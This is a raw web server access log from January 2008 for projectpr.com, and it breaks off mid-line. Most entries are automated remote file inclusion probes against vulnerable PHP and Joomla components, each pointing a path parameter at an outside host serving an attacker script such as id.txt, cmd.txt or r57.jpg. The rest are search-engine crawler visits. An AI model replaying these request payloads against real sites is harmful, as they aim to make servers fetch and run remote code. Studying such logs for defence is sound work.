81.21.69.107 - - [12/Jan/2008:19:25:06 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:19:33:01 -0800] "GET /logs/access.log HTTP/1.0" 200 498793 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.36.144.9 - - [12/Jan/2008:19:37:33 -0800] "GET /robots.txt HTTP/1.0" 404 240 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:19:37:34 -0800] "GET /logs/access_070912.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
77.81.159.70 - - [12/Jan/2008:19:38:10 -0800] "GET /logs/access.log HTTP/1.1" 200 499369 "-" "nx2 hMgcxmbdjnymp2j odem droyMokk" "www.projectpr.com"
77.232.68.17 - - [12/Jan/2008:19:41:19 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
77.232.68.17 - - [12/Jan/2008:19:41:20 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
77.232.68.17 - - [12/Jan/2008:19:41:20 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.805" "www.projectpr.com"
77.232.68.17 - - [12/Jan/2008:19:42:01 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:19:43:14 -0800] "GET /logs/access_%3Cwbr%20/%3E070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.landmarkvastgoed.nl/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:19:43:14 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.landmarkvastgoed.nl/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:19:43:14 -0800] "GET /logs/access_%3Cwbr%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.landmarkvastgoed.nl/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
65.74.150.192 - - [12/Jan/2008:19:48:02 -0800] "GET /logs/access_%3Cwbr%20/%3E070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.landmarkvastgoed.nl/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
70.86.201.130 - - [12/Jan/2008:19:56:41 -0800] "GET /logs/access_%3Cwbr%20/%3E070812.log/comisaru/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.86.201.130 - - [12/Jan/2008:19:56:41 -0800] "GET /comisaru/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.86.201.130 - - [12/Jan/2008:19:56:41 -0800] "GET /logs/access_%3Cwbr%20/comisaru/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
77.232.68.17 - - [12/Jan/2008:19:58:39 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.10.11 - - [12/Jan/2008:20:00:10 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 295 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.projectpr.com"
213.189.10.11 - - [12/Jan/2008:20:00:10 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.projectpr.com"
207.58.134.215 - - [12/Jan/2008:20:02:02 -0800] "GET /logs/access_%3Cwbr%20/%3E070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.landmarkvastgoed.nl/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.134.215 - - [12/Jan/2008:20:02:03 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.landmarkvastgoed.nl/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.134.215 - - [12/Jan/2008:20:02:03 -0800] "GET /logs/access_%3Cwbr%20//addpost_newpoll.php?addpoll=preview&thispath=http://www.landmarkvastgoed.nl/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:20:06:07 -0800] "GET /logs/access_070812.log/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:20:06:12 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:20:06:14 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
82.140.91.131 - - [12/Jan/2008:20:08:12 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://weblime.ru/id???? HTTP/1.1" 404 337 "-" "libwww-perl/5.805" "www.projectpr.com"
82.140.91.131 - - [12/Jan/2008:20:08:12 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
82.140.91.131 - - [12/Jan/2008:20:08:13 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.30.226.137 - - [12/Jan/2008:20:08:37 -0800] "GET /logs/access.log HTTP/1.0" 200 505065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:20:18:01 -0800] "GET /logs/access_070712.log/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:20:20:31 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:20:20:31 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:20:20:31 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
213.189.10.11 - - [12/Jan/2008:20:21:50 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 290 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.projectpr.com"
213.189.10.11 - - [12/Jan/2008:20:21:50 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:20:22:46 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:20:22:52 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.projectpr.com"
67.91.198.51 - - [12/Jan/2008:20:32:35 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.projectpr.com"
67.91.198.51 - - [12/Jan/2008:20:32:35 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.projectpr.com"
82.140.91.131 - - [12/Jan/2008:20:43:37 -0800] "GET /logs/access_070812.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
82.140.91.131 - - [12/Jan/2008:20:43:37 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
82.140.91.131 - - [12/Jan/2008:20:43:38 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
200.222.110.249 - - [12/Jan/2008:20:44:44 -0800] "GET /viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=http://www.bordon-slo.com/borda.jpg? HTTP/1.1" 404 287 "-" "libwww-perl/5.803" "www.projectpr.com"
82.140.91.131 - - [12/Jan/2008:20:45:09 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://weblime.ru/id???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:20:45:43 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:20:45:44 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:20:45:44 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:20:46:01 -0800] "GET /logs/access_070812.log/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:20:46:03 -0800] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:20:46:05 -0800] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.10.11 - - [12/Jan/2008:20:51:59 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.projectpr.com"
213.189.10.11 - - [12/Jan/2008:20:51:59 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.projectpr.com"
195.242.208.120 - - [12/Jan/2008:20:55:20 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
83.16.96.219 - - [12/Jan/2008:20:57:40 -0800] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.projectpr.com"
83.16.96.219 - - [12/Jan/2008:20:57:42 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.projectpr.com"
63.123.238.8 - - [12/Jan/2008:20:58:22 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.projectpr.com"
63.123.238.8 - - [12/Jan/2008:20:58:23 -0800] "GET / HTTP/1.1" 200 9521 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.projectpr.com"
74.53.229.194 - - [12/Jan/2008:21:00:24 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.242.208.120 - - [12/Jan/2008:21:00:39 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:21:00:44 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 308 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.229.194 - - [12/Jan/2008:21:05:41 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.53.229.194 - - [12/Jan/2008:21:05:42 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://boringtime.com/banget?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
83.16.96.219 - - [12/Jan/2008:21:09:41 -0800] "GET /!scanhttp://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.projectpr.com"
83.16.96.219 - - [12/Jan/2008:21:09:45 -0800] "GET /logs/!scanhttp://34639.webtest.goneo.de/ultrastats/include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:21:11:55 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
195.242.208.120 - - [12/Jan/2008:21:13:13 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.242.208.120 - - [12/Jan/2008:21:13:13 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:21:14:57 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:21:17:18 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.249.19.17 - - [12/Jan/2008:21:17:18 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:21:19:30 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:21:19:30 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.808" "www.projectpr.com"
195.242.208.120 - - [12/Jan/2008:21:20:48 -0800] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.242.208.120 - - [12/Jan/2008:21:20:49 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
201.232.85.19 - - [12/Jan/2008:21:23:36 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.805" "www.projectpr.com"
201.232.85.19 - - [12/Jan/2008:21:23:36 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
195.242.208.120 - - [12/Jan/2008:21:24:11 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.9.250.194 - - [12/Jan/2008:21:34:07 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.110.136 - - [12/Jan/2008:21:39:42 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.17.110.136 - - [12/Jan/2008:21:39:42 -0800] "GET //skin/zero_vote/error.php?dir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
85.17.110.136 - - [12/Jan/2008:21:39:42 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 276 "-" "libwww-perl/5.805" "www.projectpr.com"
213.189.10.11 - - [12/Jan/2008:21:41:54 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.projectpr.com"
213.189.10.11 - - [12/Jan/2008:21:41:54 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://gay123456.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.projectpr.com"
74.220.207.67 - - [12/Jan/2008:21:44:41 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 287 "-" "libwww-perl/5.808" "www.projectpr.com"
74.220.207.67 - - [12/Jan/2008:21:44:41 -0800] "GET //skin/zero_vote/error.php?dir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.220.207.67 - - [12/Jan/2008:21:44:41 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.116.117.149 - - [12/Jan/2008:21:48:09 -0800] "GET //administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 333 "-" "libwww-perl/5.803" "www.projectpr.com"
72.9.250.194 - - [12/Jan/2008:21:49:06 -0800] "GET /logs/access.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 322 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.250.194 - - [12/Jan/2008:21:49:06 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
124.32.128.178 - - [12/Jan/2008:21:50:06 -0800] "GET //login.php?dir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.116.117.149 - - [12/Jan/2008:21:51:33 -0800] "GET /logs/access.log//administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
62.116.117.149 - - [12/Jan/2008:21:51:33 -0800] "GET /logs//administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.116.250.28 - - [12/Jan/2008:21:54:15 -0800] "GET //administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
72.9.250.194 - - [12/Jan/2008:22:00:00 -0800] "GET /logs/access_070912.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.75.245.164 - - [12/Jan/2008:22:00:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
64.79.214.81 - - [12/Jan/2008:22:00:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
62.116.117.149 - - [12/Jan/2008:22:02:12 -0800] "GET /logs/access_071112.log//administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.116.250.28 - - [12/Jan/2008:22:03:53 -0800] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
190.2.45.165 - - [12/Jan/2008:22:05:50 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 287 "-" "libwww-perl/5.808" "www.projectpr.com"
190.2.45.165 - - [12/Jan/2008:22:05:51 -0800] "GET //skin/zero_vote/error.php?dir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
190.2.45.165 - - [12/Jan/2008:22:05:53 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:22:05:57 -0800] "GET /logs/access_070812.log/distribution/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:22:06:00 -0800] "GET /distribution/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.76.186.87 - - [12/Jan/2008:22:06:03 -0800] "GET /logs/distribution/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 325 "-" "libwww-perl/5.805" "www.projectpr.com"
62.75.245.164 - - [12/Jan/2008:22:08:03 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
62.75.245.164 - - [12/Jan/2008:22:08:03 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
85.214.29.90 - - [12/Jan/2008:22:08:05 -0800] "GET //skin/zero_vote/error.php?dir=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
74.220.207.135 - - [12/Jan/2008:22:08:56 -0800] "GET //skin/zero_vote/error.php?dir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
217.116.250.28 - - [12/Jan/2008:22:09:17 -0800] "GET /logs/access_070912.log//administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.116.250.28 - - [12/Jan/2008:22:09:17 -0800] "GET /logs//administrator/components/com_mosmedia/includes/info.html.php?mosConfi